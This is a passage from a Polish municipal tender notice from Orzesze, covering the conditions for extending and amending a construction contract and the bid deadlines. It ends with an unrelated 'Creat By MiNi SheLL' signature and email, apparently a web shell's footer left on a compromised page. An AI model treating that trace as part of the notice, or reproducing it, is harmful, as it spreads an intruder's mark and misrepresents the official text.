a) wystąpienie zamówień dodatkowych, spełniających przesłanki, o których mowa w art. 67 ust. 1 pkt 5 Pzp o wartości przekraczającej wyrażoną w złotych równowartość kwoty 30.000 euro lub o wartości nie przekraczającej wyrażonej w złotych równowartości kwoty 30.000 euro,
b) wystąpienie warunków geotechnicznych, geologicznych, terenowych, wodnych, hydrologicznych, odmiennych od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w szczególności: 
istnienia podziemnych urządzeń, instalacji, fragmentów budowli, obiektów infrastrukturalnych lub ich części, 
warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, w szczególności: temperatury powietrza poniżej 0,0 C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), śniegu, gradobicie, burze z wyładowaniami atmosferycznymi
warunki atmosferyczne uniemożliwiające dokonywanie odbiorów, przeprowadzanie prób i sprawdzeń zgodnie z technologią przewidzianą przez producentów
niewypały i niewybuchy;
pożar - utrudniających terminowe lub prawidłowe wykonanie zamówienia
klęski żywiołowe
c) wystąpienie w trakcie wykonywania zamówienia odkrycia, co do którego istnieje przypuszczenie, iż jest ono związane z zabytkiem lub uzasadnione będzie zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia lub w razie potrzeby, zorganizowania badania archeologicznego, wykopaliska archeologiczne itp.,
d) wystąpienie siły wyższej,
e)   wystąpienie zmian w przepisach prawa,
f) działanie lub zaniechanie organów władzy publicznej lub instytucji, w tym zmiany urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania robót budowlanych,
g) przerwy w wykonywaniu robót budowlanych wskutek zdarzeń niemożliwych do przewidzenia w chwili zawarcia umowy,
h) wprowadzenie przez projektanta w trybie nadzoru autorskiego zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych a także usunięcie błędów  w celu wykonania robót budowlanych,  a także wykonania robót budowlanych w terminie określonym w umowie
i) przekroczenie określonych w przepisach prawa terminów wydawania decyzji, zezwoleń, itp., jeżeli nie wynika to z przyczyn leżących po stronie Wykonawcy, w przypadku jeżeli są wymagane 
j) wydanie postanowienia lub decyzji o wstrzymaniu robót budowlanych, w przypadkach określonych w przepisach ustawy - Prawo budowlane,
k) wydanie orzeczenia przez sąd lub inny podmiot, którego nie można było przewidzieć w chwili zawarcia umowy, 
l) wykonanie robót zamiennych, jeżeli ich wykonanie wstrzymuje wykonanie robót budowlanych.
ł) wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie przedmiotu zamówienia 
m) Wstrzymanie robót przez Zamawiającego, nie będących  następstwem okoliczności leżących po stronie Wykonawcy
n) Nieterminowe przekazanie terenu budowy przez Zamawiającego, nie będących  następstwem okoliczności leżących po stronie Wykonawcy
o) Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, w szczególności:
- brak możliwości dojazdu oraz transportu materiałów na teren budowy spowodowany awariami, remontami lub przebudowami dróg dojazdowych 
- protesty mieszkańców

4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu, nie dłużej jednak niż o okres trwania tych okoliczności
5. Za zgodą stron umowy dopuszcza się również dokonanie następujących istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy poprzez zmiany sposobu wykonania robót budowlanych, w tym wprowadzenia robót zamiennych, wskutek:
a) okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla zamawiającego, 
b) warunków atmosferycznych, geotechnicznych, geologicznych, terenowych, wodnych, hydrologicznych, odmiennych od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, istnienia podziemnych urządzeń, instalacji, fragmentów budowli lub ich części, 
c) zmian technologicznych spowodowanych w szczególności:
pojawieniem się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów wykonania robót budowlanych lub umożliwiające uzyskanie lepszej jakości tych robót,
pojawienie się nowszej technologii wykonania robót budowlanych  pozwalającej na zaoszczędzenie czasu wykonania robót budowlanych lub kosztów ich eksploatacji,
konieczność wykonania robót budowlanych przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych ze względu na zmiany w przepisach prawa;
6.	Zmiany, o których mowa w ust. 3 i 5 nie mogą stanowić podstawy do zwiększenia 	wynagrodzenia.
7. Przewiduje się możliwość wprowadzenia zmian osobowych: 
a)  zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane,  jeżeli są wymagane przy realizacji umowy
b) zmiana osób, przy pomocy których Zamawiający realizuje przedmiot umowy na inne osoby  legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane,  jeżeli są wymagane przy realizacji umowy
c) zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego, z zastrzeżeniem postanowień §13
d)  rozszerzenie lub zmniejszenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie wykonawcy
8. Przewiduje się możliwość wprowadzenia zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian w zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu; jeżeli ma zastosowanie do przedmiotowej umowy
9. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
9.1.zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy 
9.2.zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.orzesze.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski  Orzesze  ul. Św. Wawrzyńca 21,   43 - 180 Orzesze  lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.01.2016 godzina 09:00, miejsce: Urząd Miejski Orzesze  ul. Św. Wawrzyńca 21,  43 - 180 Orzesze, Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com